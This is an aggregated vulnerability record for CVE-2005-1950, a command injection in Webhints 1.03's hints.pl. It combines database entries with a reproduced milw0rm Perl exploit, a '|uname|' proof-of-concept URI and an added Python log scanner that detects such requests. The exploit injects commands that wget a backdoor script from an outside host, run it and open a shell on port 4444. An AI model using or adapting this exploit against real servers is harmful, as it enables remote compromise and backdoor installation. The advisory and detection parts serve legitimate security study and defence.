CVE-2005-1950
CVSS 7.5
Published: 2005-06-09 00:00:00
Last modified: 2016-10-17 23:23:30

[Original] hints.pl in Webhints 1.03 allows remote attackers to execute arbitrary commands via shell metacharacters in the argument.


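[CNNVD] Darryl Burgdorf Webhints hints.pl script remote command execution vulnerability (CNNVD-200506-083)

        The hints.pl script in Webhints 1.03 allows remote attackers to execute arbitrary commands via shell metacharacters in the argument.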

- CVSS (Base Score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

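- CPE (Affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (Technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1950
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1950
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200506-083
(Official data source) CNNVD

- Other links and resources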

http://marc.info/?l=bugtraq&m=111842893001406&w=2
(UNKNOWN)  BUGTRAQ  20050609 Webhints v1.03 Remote Command Execution
http://securitytracker.com/id?1014173
(UNKNOWN)  SECTRACK  1014173
http://www.securityfocus.com/bid/13930
(UNKNOWN)  BID  13930

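- Vulnerability information

Darryl Burgdorf Webhints hints.pl script remote command execution vulnerability
High risk  Input validation
2005-06-09 00:00:00 2005-10-20 00:00:00
Remote
        The hints.pl script in Webhints 1.03 allows remote attackers to execute arbitrary commands via shell metacharacters in the argument.

- Advisories and patches

- Vulnerability information (1039)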

Webhints <= 1.03 Remote Command Execution Exploit (perl code) (1) (EDBID:1039)
cgi webapps
2005-06-11 Verified
0 Alpha_Programmer
N/A
# This exploit uses a backdoor that isn't located on this server.
# $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";
# change for your own needs. /str0ke

#!/usr/bin/perl
######################################################################################
#        T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m           #
######################################################################################
#  EXPLOIT FOR: WebHints Remote C0mmand Execution Vuln                               #
#                                                                                    #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v)                               #
#Email: Alpha_Programmer@Yahoo.Com                                                   #
#                                                                                    #
#This Xpl Run a backdo0r in Server With 4444 Port.                                   #
#Advisory: http://www.securityfocus.com/archive/1/401940/30/0/threaded               #
######################################################################################
# GR33tz T0 ==>     mh_p0rtal  --  oil_Karchack  --  The-CephaleX  -- Str0ke         #
#And Iranian Security & Technical Sites:                                             #
#                                                                                    #
#         TechnoTux.Com , IranTux.Com , Iranlinux.ORG , Barnamenevis.ORG             #
#      Crouz ,  Simorgh-ev   , IHSsecurity , AlphaST , Shabgard &  GrayHatz.NeT      #
######################################################################################

use IO::Socket;

if (@ARGV < 2)
{
 print "\n==============================================\n";
 print " \n    WebHints Exploit By Alpha_Programmer \n\n";
 print "      Trap-Set Underground Hacking Team      \n\n";
 print "            Usage: <T4rg3t> <Dir>      \n\n";
 print "==============================================\n\n";
 print "Examples:\n\n";
 print "    Webhints.pl www.Host.com /cgi-bin/ \n";
 exit();
}


$serv = $ARGV[0];
$serv =~ s/http:\/\///ge;

$dir = $ARGV[1];

$cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";
$cmde2 = "cd /tmp;cp alpha.txt alpha.pl;chmod 777 alpha.pl;perl alpha.pl";

$req = "GET $dir";
$req .= "hints.pl?|$cmde| HTTP/1.0\n\n\n\n";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";

print $sock $req;
print "\nPlease Wait ...\n\n";
sleep(3000);
close($sock);

$sock2 = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";


$req2 = "GET $dir";
$req2 .= "hints.pl?|$cmde2| HTTP/1.0\n\n\n\n";

print $sock2 $req2;

sleep(100);

print "\n\n$$$   OK -- Now Try: Nc -v www.Site.com 4444   $$$\n";
print "$$  if This Port was Close , This mean is That , You Haven't Permission to Write in /TMP  $$\n";
print "Enjoy ;)";
### EOF ###

# milw0rm.com [2005-06-11]
		

- Vulnerability information

17287
WebHints hints.pl Arbitrary Command Execution
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-06-09 Unknown
2005-06-09 Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Darryl Burgdorf Webhints Remote Command Execution Vulnerability
Input Validation Error 13930
Yes No
2005-05-09 12:00:00 2009-07-12 02:56:00
blahplok@yahoo.com is credited with the discovery of this vulnerability.

- Affected software versions

Darryl Burgdorf Webhints 1.3
Colored Scripts Easy Message Board

- Vulnerability discussion

Darryl Burgdorf Webhints is prone to a remote command execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

- Exploit

No exploit is required.

The following proof of concept URI is available:
http://www.example.com/hints.pl?|uname|
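
A detection check for the request pattern shown above, as an added example that is not part of the original record: it scans web-server access-log lines for requests to hints.pl whose query string carries shell metacharacters, including percent-encoded, double-encoded and unencoded-space forms. The log lines are constructed samples, and the function names and metacharacter set are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Request field of a common/combined-format log entry. The target is matched
# lazily so a raw request containing unencoded spaces is still captured whole.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>.*?)(?: HTTP/\d\.\d)?"')
# '|' is the character in the proof-of-concept URI; '&' is left out because it
# is the normal query-string separator and would flag ordinary requests.
SHELL_META = set("|;`$<>\n\r")
SCRIPT_NAME = "hints.pl"

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded '|' (%257C) is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_hints_request(log_line):
    """Return the decoded query if the line is a hints.pl request carrying
    shell metacharacters, otherwise None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    path, sep, query = match.group("target").partition("?")
    if not sep or fully_decode(path).rsplit("/", 1)[-1].lower() != SCRIPT_NAME:
        return None
    decoded = fully_decode(query)
    return decoded if SHELL_META & set(decoded) else None

def scan(lines):
    """Return (client address, decoded query) for every flagged line."""
    hits = []
    for line in lines:
        payload = suspicious_hints_request(line)
        if payload is not None:
            hits.append((line.split(" ", 1)[0], payload))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Jun/2005:10:00:01 +0000] "GET /cgi-bin/hints.pl HTTP/1.0" 200 512',
    '192.0.2.11 - - [09/Jun/2005:10:00:05 +0000] "GET /cgi-bin/hints.pl?|uname| HTTP/1.0" 200 64',
    '192.0.2.12 - - [09/Jun/2005:10:00:09 +0000] "GET /cgi-bin/hints.pl?%7Cuname%7C HTTP/1.1" 200 64',
    '192.0.2.13 - - [09/Jun/2005:10:00:12 +0000] "GET /cgi-bin/HINTS.PL?%257Cuname%257C HTTP/1.1" 200 64',
    '192.0.2.14 - - [09/Jun/2005:10:00:15 +0000] "GET /cgi-bin/hints.pl?|uname -a| HTTP/1.0" 200 64',
    '192.0.2.15 - - [09/Jun/2005:10:00:20 +0000] "GET /index.html?a=1|2 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, payload in scan(SAMPLE_LOG):
        print(client, repr(payload))
```
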

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related references

 

 
